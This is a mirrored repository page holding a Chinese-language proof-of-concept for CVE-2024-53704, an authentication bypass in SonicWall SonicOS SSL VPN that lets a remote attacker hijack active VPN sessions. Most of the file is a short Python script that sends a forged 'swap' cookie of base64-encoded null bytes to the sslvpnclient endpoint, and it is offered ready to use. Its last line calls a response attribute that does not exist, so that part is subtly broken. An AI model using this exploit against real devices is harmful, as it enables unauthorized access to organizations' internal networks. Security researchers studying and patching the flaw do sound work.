admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-28 09:10:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/SonicWall/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md

23 lines
744 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704)
**SonicWall防火墙的身份验证旁路允许远程攻击者劫持Active SSL SSL VPN会话并获得未经授权的网络访问Sononicos版本7.1.x7.1.1-7058及以上7.1.2-7019和8.0.0-8035受到影响**。
## poc
```python
import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
resp = requests.get(
"https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
cookies={"swap": base64.b64encode(b"\x00" * 32).decode()},
verify=False
)
print(resp.headers)
print(resp.body)
```
## 漏洞来源
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
Reference in New Issue Copy Permalink